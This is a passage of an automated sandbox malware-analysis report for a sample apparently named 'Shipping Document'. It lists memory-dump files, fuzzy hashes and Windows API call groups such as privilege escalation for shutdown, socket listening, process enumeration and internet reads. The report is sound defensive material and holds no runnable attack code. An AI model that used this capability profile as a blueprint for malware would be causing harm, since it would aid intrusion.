                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID:
                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                              • API String ID: 0-1546025612
                              • Opcode ID: ce4d4ba344302b3f548ed25106c882fd932786b3949d59985f5d90bcc83d188c
                              • Instruction ID: 6d0aed1e80f38552843c95dba0625cc776b3b4847f380836ce0cdb9abde9d2ca
                              • Opcode Fuzzy Hash: ce4d4ba344302b3f548ed25106c882fd932786b3949d59985f5d90bcc83d188c
                              • Instruction Fuzzy Hash: C5A27371D0021ACBEF25CF58C9907ADB7B2BF44314F1881AAD996A7380D734AD81EF51
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: a9265c65853ab2fb1cb22602cc2af06469a5fac96296562c48fb18bb156759fe
                              • Instruction ID: d3cf0c596feb3439809623000febf15a9dc83b4fa80f432ab40f158443feb1d4
                              • Opcode Fuzzy Hash: a9265c65853ab2fb1cb22602cc2af06469a5fac96296562c48fb18bb156759fe
                              • Instruction Fuzzy Hash: 8A12DE70A0060ADFDF14DFA5C981AEEB7F6FF48300F14412AE486A7255EB3AAD51DB50
                              APIs
                                • Part of subcall function 01018CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 01018D0D
                                • Part of subcall function 01018CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01018D3A
                                • Part of subcall function 01018CC3: GetLastError.KERNEL32 ref: 01018D47
                              • ExitWindowsEx.USER32(?,00000000), ref: 0102549B
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                              • String ID: $@$SeShutdownPrivilege
                              • API String ID: 2234035333-194228
                              • Opcode ID: 609d7be520e32b907b5bc78627caeb05ccfc0700cdefe409fb7f77605f2dfcf1
                              • Instruction ID: 418a9fd985b55aabd1ad42c4fb03464bd9f1e1d9ad76c31af52627156763ea5b
                              • Opcode Fuzzy Hash: 609d7be520e32b907b5bc78627caeb05ccfc0700cdefe409fb7f77605f2dfcf1
                              • Instruction Fuzzy Hash: 53014C71B562325BF778567CDC4ABFAF2A8EB0425BF140061FDC6D60C2DE954C004298
                              APIs
                              • socket.WSOCK32(00000002,00000001,00000006), ref: 010365EF
                              • WSAGetLastError.WSOCK32(00000000), ref: 010365FE
                              • bind.WSOCK32(00000000,?,00000010), ref: 0103661A
                              • listen.WSOCK32(00000000,00000005), ref: 01036629
                              • WSAGetLastError.WSOCK32(00000000), ref: 01036643
                              • closesocket.WSOCK32(00000000), ref: 01036657
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ErrorLast$bindclosesocketlistensocket
                              • String ID:
                              • API String ID: 1279440585-0
                              • Opcode ID: af4e7968fa7737151c244c702d1442d8703d87b9c0b8002882b3898e6d7b186a
                              • Instruction ID: 11e8c4d10e74779b4ffe6241e5017376a03e0c6286f5b1154717eb0dbabc26f0
                              • Opcode Fuzzy Hash: af4e7968fa7737151c244c702d1442d8703d87b9c0b8002882b3898e6d7b186a
                              • Instruction Fuzzy Hash: 4F21C375200211AFDB10EF68C989F6EB7E9EF89310F118159E996E72C1CB79AD00DB51
                              APIs
                                • Part of subcall function 00FE0FF6: std::exception::exception.LIBCMT ref: 00FE102C
                                • Part of subcall function 00FE0FF6: __CxxThrowException@8.LIBCMT ref: 00FE1041
                              • _memmove.LIBCMT ref: 0101062F
                              • _memmove.LIBCMT ref: 01010744
                              • _memmove.LIBCMT ref: 010107EB
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: _memmove$Exception@8Throwstd::exception::exception
                              • String ID:
                              • API String ID: 1300846289-0
                              • Opcode ID: 43521217e45e490ad97e873989c8d4ff83c4e14a272aa0a633083ad641259134
                              • Instruction ID: 818234a8f8e011390c694e351e11cbed824b95407c721fa405e3feb0e965a6b5
                              • Opcode Fuzzy Hash: 43521217e45e490ad97e873989c8d4ff83c4e14a272aa0a633083ad641259134
                              • Instruction Fuzzy Hash: D002AF70E00209DBDF04DF65D981AAEBBB5FF44300F1480A9F886DB259EB39DA51DB91
                              APIs
                                • Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623
                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 00FC19FA
                              • GetSysColor.USER32(0000000F), ref: 00FC1A4E
                              • SetBkColor.GDI32(?,00000000), ref: 00FC1A61
                                • Part of subcall function 00FC1290: DefDlgProcW.USER32(?,00000020,?), ref: 00FC12D8
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ColorProc$LongWindow
                              • String ID:
                              • API String ID: 3744519093-0
                              • Opcode ID: e06de5c28f90fe10f5a008b3aa09b0fb121bda40bc8f05f05b6e044d7432903d
                              • Instruction ID: 60dcac6c8343017f4a808803fcbbcebfbd4de1c7e473f93980601c454f91dc40
                              • Opcode Fuzzy Hash: e06de5c28f90fe10f5a008b3aa09b0fb121bda40bc8f05f05b6e044d7432903d
                              • Instruction Fuzzy Hash: 74A13BB250644BBAE734AA298E86FBF355CFF83361B14011DF542D5197CA2DCC21B2B1
                              APIs
                                • Part of subcall function 010380A0: inet_addr.WSOCK32(00000000), ref: 010380CB
                              • socket.WSOCK32(00000002,00000002,00000011), ref: 01036AB1
                              • WSAGetLastError.WSOCK32(00000000), ref: 01036ADA
                              • bind.WSOCK32(00000000,?,00000010), ref: 01036B13
                              • WSAGetLastError.WSOCK32(00000000), ref: 01036B20
                              • closesocket.WSOCK32(00000000), ref: 01036B34
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ErrorLast$bindclosesocketinet_addrsocket
                              • String ID:
                              • API String ID: 99427753-0
                              • Opcode ID: 5ea990b164cf006b5a803eb20f9651491d1da73bd9b919cdbfe05e383be22c97
                              • Instruction ID: 5e3f3a81d71d31ed16d5df46e5d03533cfb8702d53b15bf5cadbdb36ed159ef6
                              • Opcode Fuzzy Hash: 5ea990b164cf006b5a803eb20f9651491d1da73bd9b919cdbfe05e383be22c97
                              • Instruction Fuzzy Hash: C341D475700611AFEB10AF68DD87F6E77E8DB44B10F04805CF95AAB3C2CAB99D019B91
                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                              • String ID:
                              • API String ID: 292994002-0
                              • Opcode ID: 0c6ba2f2ff1c0ef33c991350af335a0866f2c2090dcab3a4529017aba78642f0
                              • Instruction ID: cdecad418fbc24b8134fb1da9768c0e65accc14b1443b0cf249b530e14c1acbe
                              • Opcode Fuzzy Hash: 0c6ba2f2ff1c0ef33c991350af335a0866f2c2090dcab3a4529017aba78642f0
                              • Instruction Fuzzy Hash: C011C4B53005126FE7216F2AED85B2F7BD8EF48721F004079F986D7241CB799901CAA4
                              APIs
                              • CoInitialize.OLE32(00000000), ref: 0102C69D
                              • CoCreateInstance.OLE32(01052D6C,00000000,00000001,01052BDC,?), ref: 0102C6B5
                                • Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82
                              • CoUninitialize.OLE32 ref: 0102C922
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CreateInitializeInstanceUninitialize_memmove
                              • String ID: .lnk
                              • API String ID: 2683427295-24824748
                              • Opcode ID: 5b7b8ec9b1fd3fa00e24f41ca6f459f69271d40191baae30a5cbf1adf9cf892b
                              • Instruction ID: a37d6b5d580fcba3039c69bc45ac0d9789697d2e82e10a154eac293cd047ce23
                              • Opcode Fuzzy Hash: 5b7b8ec9b1fd3fa00e24f41ca6f459f69271d40191baae30a5cbf1adf9cf892b
                              • Instruction Fuzzy Hash: 07A12B71108206AFD300EF64CD86EABB7ECEF94704F00495CF1969B191DBB5EA49DB92
                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,?,01001D88,?), ref: 0103C312
                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0103C324
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetSystemWow64DirectoryW$kernel32.dll
                              • API String ID: 2574300362-1816364905
                              • Opcode ID: b7bfd4939f32a719189c1fd0dfd7bdd004432492a437b920ad822114fe921d5c
                              • Instruction ID: 40edbbd27e4d94a04ec065bce403fa941952ea2782a458e9590f97154eca3de8
                              • Opcode Fuzzy Hash: b7bfd4939f32a719189c1fd0dfd7bdd004432492a437b920ad822114fe921d5c
                              • Instruction Fuzzy Hash: 97E0C2F8600303CFEB314F2EC654A5676D8EF49244B80C86EE8C5E6220E774D440CBA0
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: __itow__swprintf
                              • String ID:
                              • API String ID: 674341424-0
                              • Opcode ID: cf67c576df59a26a14e30c380d0ba19e3af26447315f2169b354535c4bbd412f
                              • Instruction ID: a01408d7bc764e4b2ab223ee1cb3882b98f1bbee04edb1f2963b09d7db0a1c04
                              • Opcode Fuzzy Hash: cf67c576df59a26a14e30c380d0ba19e3af26447315f2169b354535c4bbd412f
                              • Instruction Fuzzy Hash: 9622AC715083029FD725DF28C881B6EB7E5AF84710F08491EF6CA97391DB79EA04DB92
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0103F151
                              • Process32FirstW.KERNEL32(00000000,?), ref: 0103F15F
                                • Part of subcall function 00FC7F41: _memmove.LIBCMT ref: 00FC7F82
                              • Process32NextW.KERNEL32(00000000,?), ref: 0103F21F
                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0103F22E
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                              • String ID:
                              • API String ID: 2576544623-0
                              • Opcode ID: 16d31f0e3117a9a76ca501ab0d0f5f437b215ccfe91edfbb3dfe0851dce34373
                              • Instruction ID: 6adf5865106df99ed537fce1726483b9c8b64f0b2a5ebf21400516673e7fb9bd
                              • Opcode Fuzzy Hash: 16d31f0e3117a9a76ca501ab0d0f5f437b215ccfe91edfbb3dfe0851dce34373
                              • Instruction Fuzzy Hash: 6C517C71508302AFD320EF24DD86F6BBBE8AF94B10F10481DF59597291EB74A908DB92
                              APIs
                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0101EB19
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: lstrlen
                              • String ID: ($|
                              • API String ID: 1659193697-1631851259
                              • Opcode ID: d4d0a0a4903439eb9c5e4943c85c0a198a2741866e6e822359d99e97087615c6
                              • Instruction ID: b26db33889195eb5d1dfa31da0068ffb512770c78ad7bd6ef41c26896c46a2bd
                              • Opcode Fuzzy Hash: d4d0a0a4903439eb9c5e4943c85c0a198a2741866e6e822359d99e97087615c6
                              • Instruction Fuzzy Hash: D8323775A007059FDB29CF19C480A6AB7F1FF48320B15C5AEE99ADB3A5D770E981CB40
                              APIs
                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 010326D5
                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0103270C
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: Internet$AvailableDataFileQueryRead
                              • String ID:
                              • API String ID: 599397726-0
                              • Opcode ID: fb8842f0fea9fdf3bc1302c59e5a835ead8a60d3d6386d7c7eb6f918b6cac10d
                              • Instruction ID: c8a82743eda69aaa03e3586e052f85ac36674788dffb5c9dbd68fb0ef6c998cb
                              • Opcode Fuzzy Hash: fb8842f0fea9fdf3bc1302c59e5a835ead8a60d3d6386d7c7eb6f918b6cac10d
                              • Instruction Fuzzy Hash: 0741F375900209BFEB21DA59DD84EBFB7FCFF84724F0040AAF681A6140EB759E41A650
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0102B5AE
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0102B608
                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0102B655
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID:
                              • API String ID: 1682464887-0
                              • Opcode ID: 61fc4eb641d221a986bc50570dc1fdef5a9951ffc4c17543d8cf2a05472f20e6
                              • Instruction ID: a27a5ea0a3137b503f3548f7ed8cbebe455fd9510af48fa5b3891837dc1c83b0
                              • Opcode Fuzzy Hash: 61fc4eb641d221a986bc50570dc1fdef5a9951ffc4c17543d8cf2a05472f20e6
                              • Instruction Fuzzy Hash: 30219D75A00519EFCB00EFA5D984EEEBBB8FF48310F0480A9E945AB351CB35A905CF50
                              APIs
                                • Part of subcall function 00FE0FF6: std::exception::exception.LIBCMT ref: 00FE102C
                                • Part of subcall function 00FE0FF6: __CxxThrowException@8.LIBCMT ref: 00FE1041
                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 01018D0D
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01018D3A
                              • GetLastError.KERNEL32 ref: 01018D47
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                              • String ID:
                              • API String ID: 1922334811-0
                              • Opcode ID: daf836e9b9ecb50e0fc6e69e895c78294e2d2b6f5b6f3d9210b30b948542b792
                              • Instruction ID: 97f06949b3006621c2cd7708e033babfa29bb43e7a8add5e6fbff29093e3c3dc
                              • Opcode Fuzzy Hash: daf836e9b9ecb50e0fc6e69e895c78294e2d2b6f5b6f3d9210b30b948542b792
                              • Instruction Fuzzy Hash: 5311BFB1414309AFE328AF58DC85D6BB7F9FB44710B10C52EF89683205EB74A9408B60
                              APIs
                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0102404B
                              • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 01024088
                              • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 01024091
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: CloseControlCreateDeviceFileHandle
                              • String ID:
                              • API String ID: 33631002-0
                              • Opcode ID: 63786eeb24ba6042bc4f869ee99f1e54509c31de85d9c64c0a5617903cdeb824
                              • Instruction ID: bfd208df7a634348a006ba66b23d9460a964fadaeb38642e1589d0a2d53e02e0
                              • Opcode Fuzzy Hash: 63786eeb24ba6042bc4f869ee99f1e54509c31de85d9c64c0a5617903cdeb824
                              • Instruction Fuzzy Hash: B8117CB1D00239BEE7209AECDC84FAFBBBCEB08610F000656FA44E7181C2B9594487A1
                              APIs
                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 01024C2C
                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 01024C43
                              • FreeSid.ADVAPI32(?), ref: 01024C53
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd
                              Similarity
                              • API ID: AllocateCheckFreeInitializeMembershipToken
                              • String ID:
                              • API String ID: 3429775523-0
                              • Opcode ID: ffa8cfe6bbd20d0c91a92372532dcf7b5967a96dd7e05e436f935a25ce6f5ae5
                              • Instruction ID: a1b0f4fcd513d41c1f68377624c3015b73edb64253f0d9ff37d01260e1757e2b
                              • Opcode Fuzzy Hash: ffa8cfe6bbd20d0c91a92372532dcf7b5967a96dd7e05e436f935a25ce6f5ae5
                              • Instruction Fuzzy Hash: 09F04F7591130DBFDF14DFF4D989AAEBBBCEF08201F5044A9A501E2180D6756A048B50
                              Memory Dump Source
                              • Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                              • Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
